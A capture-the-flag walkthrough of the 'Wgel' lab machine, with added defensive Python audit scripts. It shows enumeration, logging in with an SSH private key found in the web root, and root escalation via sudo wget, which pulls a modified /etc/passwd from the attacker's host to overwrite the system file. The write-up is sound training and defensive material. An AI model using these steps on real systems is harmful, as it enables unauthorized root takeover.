gkhns/Wgel-CTF

#Linux #Wget

NMAP Scan

  nmap -sV -sC -p- 10.10.207.235
  • To see the versions of the services running (-sV)
  • To perform a script scan using the default set of scripts (-sC)
  • To scan all ports from 1 through 65535 (-p-)

OPEN PORTS

  • 22/tcp ssh
  • 80/tcp http

Interesting info: A person named Jessie is mentioned in the website source code:

Let's try Nikto for vulnerability scanning.

Nikto is an open source web server and web application scanner. Nikto can perform comprehensive tests against web servers for multiple security threats, including over 6700 potentially dangerous files/programs. Nikto can also check for outdated web server software and version-specific problems. The commonly used commands were shown in a screenshot that is not reproduced here.

Nikto results reveal that the Apache server is outdated (version 2.4.18).

A searchsploit analysis confirms an existing vulnerability on the Apache server.

Details of CARPE (DIEM), CVE-2019-0211 (Apache local root privilege escalation), are summarized at the following link:

https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html

A Gobuster search reveals a hidden directory /sitemap (status 301).

A further Gobuster search on http://10.10.207.235/sitemap reveals a hidden /.ssh directory containing a private key!

What we need to do now is:

  1. Change the permissions of the downloaded private key: chmod 600 jessie_id_rsa
  2. Log in over SSH using the private key: ssh -i path/to/key_file username@remote_host

We can assume that the private key belongs to Jessie; this name was mentioned in a comment line in the website source code (see above).
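As an added example (not part of the original write-up), here is a defender-side check for the two findings above: an SSH private key reachable under a web document root, and a key file whose mode is wider than owner-only. The directory walk, the PEM marker list and the constructed sample tree (a /sitemap/.ssh/id_rsa layout mirroring the one found here) are assumptions of this example; point it at a real DocumentRoot instead of the temporary tree when auditing a host.

```python
"""Web-root exposure check (added example, not code from the write-up)."""
import os
import stat
import tempfile

# Directory and file names that should never be reachable from a document root.
SENSITIVE_DIRS = {".ssh", ".git", ".svn"}
SENSITIVE_NAMES = {"id_rsa", "id_dsa", "id_ecdsa", "id_ed25519", "authorized_keys"}
# Headers that identify private key material regardless of file name.
PEM_MARKERS = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN PRIVATE KEY-----",
)


def looks_like_private_key(path: str) -> bool:
    """True if the first bytes of the file carry a PEM/OpenSSH private key header."""
    try:
        with open(path, "rb") as f:
            head = f.read(64)
    except OSError:
        return False
    return head.startswith(PEM_MARKERS)


def find_exposed_keys(webroot: str) -> list[dict]:
    """Walk a document root and report sensitive dot-directories and private keys.

    Each finding records the path, the reason, and (for files) whether the mode
    grants any group/other bits, i.e. is wider than the 0600 that ssh insists on.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(webroot):
        for d in dirnames:
            if d in SENSITIVE_DIRS:
                findings.append({"path": os.path.join(dirpath, d),
                                 "reason": f"sensitive directory {d} under web root",
                                 "world_readable": None})
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            if fn in SENSITIVE_NAMES or looks_like_private_key(full):
                mode = stat.S_IMODE(os.stat(full).st_mode)
                findings.append({"path": full,
                                 "reason": "private key material reachable over HTTP",
                                 "world_readable": bool(mode & 0o077)})
    return findings


def build_sample_webroot() -> str:
    """Constructed sample: a temp document root holding sitemap/.ssh/id_rsa
    (placeholder content, not a real key) with a deliberately wide 0644 mode."""
    root = tempfile.mkdtemp(prefix="webroot_")
    ssh_dir = os.path.join(root, "sitemap", ".ssh")
    os.makedirs(ssh_dir)
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<html><!-- placeholder page --></html>\n")
    key = os.path.join(ssh_dir, "id_rsa")
    with open(key, "wb") as f:
        f.write(b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
                b"placeholder-not-a-real-key\n"
                b"-----END OPENSSH PRIVATE KEY-----\n")
    os.chmod(key, 0o644)  # too wide; ssh would reject this key as a client anyway
    return root


if __name__ == "__main__":
    for hit in find_exposed_keys(build_sample_webroot()):
        print(hit)
```

Running it prints two findings for the sample tree: the .ssh directory itself, and the key file flagged as world-readable. On a production host, anything this reports under the DocumentRoot should be moved out of the served tree, and the web server's directory listing (the 301 plus listable /sitemap/.ssh seen above) disabled.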

With the user flag captured, let's look for privilege escalation vectors. First, sudo -l lists the commands this user is allowed to run with sudo.

It seems that we can use the GTFOBins wget technique, as explained here: https://gtfobins.github.io/gtfobins/wget/

Here are the steps that can be followed:

  1. Copy /etc/passwd to the local host, generate a password for the root account, and put its hash into the password field of the copied passwd file.
  2. Start an HTTP server on the local host: sudo python3 -m http.server 80
  3. Transfer the passwd to the target machine: sudo wget http://10.18.123.93/passwd -O /etc/passwd
  4. Elevate to root with su root, using the password generated above.
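Host-side detection for the escalation path above, as an added example that is not the write-up's own code. It performs two checks: (1) /etc/passwd entries whose password field holds a hash instead of the shadow placeholder, which is exactly what an overwritten passwd looks like after the steps above, and (2) sudoers rules that let a user run wget (or another binary that can write an arbitrary file) as root, noting whether NOPASSWD applies. The sample passwd and sudoers text are constructed here, the set of file-writing binaries is an assumption to be tuned per host, and the sudoers parser handles plain user-spec lines only (no aliases or #include directives).

```python
"""passwd/sudoers audit (added example, not code from the write-up)."""
import re

# Second-field values that defer to /etc/shadow or lock the account.
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!", ""}

# Binaries that can write an arbitrary file as root when allowed through sudo
# (assumption: extend this set to match the tools present on the audited host).
FILE_WRITERS = {"wget", "curl", "tee", "cp", "dd", "mv"}

# sudoers user-spec line:  who  host = (runas) [TAG:] cmd, cmd ...
USER_SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)


def audit_passwd(passwd_text: str) -> list[str]:
    """Return usernames whose password field is not a shadow placeholder.

    On a shadow-enabled system every entry should read 'user:x:...'; a real hash
    in this field (e.g. '$6$...') takes precedence over /etc/shadow, so its
    presence is a strong sign that the file was replaced.
    """
    flagged = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            flagged.append(f"{fields[0]} (malformed entry)")
            continue
        if fields[1] not in SHADOW_PLACEHOLDERS:
            flagged.append(fields[0])
    return flagged


def audit_sudoers(sudoers_text: str) -> list[dict]:
    """Report user-spec rules granting ALL or a file-writing binary, with the
    NOPASSWD state, so a 'sudo -l' surprise is found before an attacker finds it."""
    hits = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        cmds = m.group("cmds")
        nopasswd = "NOPASSWD:" in cmds
        for cmd in re.sub(r"(NOPASSWD|PASSWD|SETENV|NOEXEC):", "", cmds).split(","):
            cmd = cmd.strip()
            binary = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
            if cmd == "ALL" or binary in FILE_WRITERS:
                hits.append({"user": m.group("who"), "command": cmd, "nopasswd": nopasswd})
    return hits


# Constructed sample inputs (not taken from the target machine).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jessie:x:1000:1000:jessie,,,:/home/jessie:/bin/bash
"""
# The same file after the overwrite described above: root carries a hash in place of 'x'.
TAMPERED_PASSWD = SAMPLE_PASSWD.replace("root:x:", "root:$6$saltsalt$PLACEHOLDERHASH:")

SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
jessie  ALL=(root) NOPASSWD: /usr/bin/wget
www-data ALL=(root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    print("passwd (clean):   ", audit_passwd(SAMPLE_PASSWD))
    print("passwd (tampered):", audit_passwd(TAMPERED_PASSWD))
    for hit in audit_sudoers(SAMPLE_SUDOERS):
        print("sudoers:", hit)
```

The clean passwd produces no findings, the tampered copy flags root, and the sudoers scan reports the jessie/wget rule as NOPASSWD (root's ALL is reported too, as a reminder that ALL subsumes every file-writer). The fix on the Wgel host is to drop the wget rule from sudoers entirely, and a file-integrity monitor on /etc/passwd and /etc/sudoers catches the overwrite itself.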
